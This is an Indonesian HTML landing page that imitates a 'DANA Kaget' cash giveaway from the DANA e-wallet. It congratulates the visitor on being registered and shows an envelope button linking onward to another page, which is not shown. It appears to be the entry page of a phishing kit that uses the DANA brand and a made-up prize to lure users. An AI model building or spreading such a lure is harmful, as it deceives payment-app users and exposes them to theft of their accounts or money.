<!DOCTYPE html>
<html>
  <head>
    <title>DANA Kaget buatmu</title>
    <meta charset="UTF-8">
  <meta property="og:image:type" content="image/jpeg">
  <meta property="og:image" content="https://telegra.ph/file/4032d0f0073f9ba65009f.jpg">
    <meta
      name="description"
      content="DANA Kaget Cuma buat kamu yang paling gesit! Sikat sekarang!"
    />
    <meta name="keywords" content="dana, danakaget, receh, uang" />
    <link
      rel="icon"
      type="image/x-icon"
      href="../assets/img/favicon/favicon.ico"
    />
    <link
      rel="apple-touch-icon"
      sizes="180x180"
      href="../assets/img/favicon/apple-touch-icon.png"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="32x32"
      href="../assets/img/favicon/favicon-32x32.png"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="16x16"
      href="../assets/img/favicon/favicon-16x16.png"
    />
    <link rel="manifest" href="../assets/img/favicon/site.webmanifest" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"
    />
    <link rel="stylesheet" type="text/css" href="../lib/style/kaget.css" />
  </head>
  <body>
    <div class="dana_index">
      <div class="head">
        <h2>DANA Kaget</h2>
      </div>
      <h1>DANA Kaget</h1>
      <h1 class="part">Selamat! Kamu terdaftar di DANA Kaget</h1>
      <button onclick="window.location.href='../int.html'">
        <img class="amplop" src="../assets/img/envelope.png" />
      </button>
      
      <!--
      <div class="footer">
        <img class="pro" src="../assets/img/logo.png" />
        <div class="bos">
                    <p class="des">Claim Sekarang juga!</p>
                </div> 
      </div>
      -->
    </div>
  </body>
</html>
